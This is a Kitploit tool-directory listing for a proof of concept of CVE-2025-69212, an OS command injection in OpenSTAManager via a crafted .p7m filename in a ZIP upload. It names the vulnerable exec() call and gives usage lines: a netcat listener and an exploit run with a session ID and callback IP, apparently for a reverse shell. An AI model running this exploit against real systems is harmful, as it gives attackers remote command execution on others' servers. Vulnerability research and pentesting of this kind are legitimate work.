Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-69212-PoC | Kitploit
Tools/GitHubGitHub/tohib09/cve-2025-69212-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubtohib09/cve-2025-69212-poc

CVE-2025-69212-PoC

View Repository
41 month agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-69212 — OpenSTAManager P7M Command Injection PoC

OpenSTAManager <= 2.9.8 — OS Command Injection via malicious .p7m filename in ZIP upload.

File: src/Util/XML.php:100 — unsanitized $file in exec()
Vector: /plugins/importFE_ZIP/actions.php → ZIP → .p7m filename → exec("openssl smime ... -in \"$file\" ...")

Usage

root@kitploit:~
# Listener
nc -lvnp 4444

# Exploit
python3 CVE-2025-69212.py http://target.htb YOUR_PHPSESSID 10.10.14.X 4444

References

  • https://github.com/advisories/GHSA-25fp-8w8p-mx36
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69212

CVE-2025-69212-PoC

Download Tool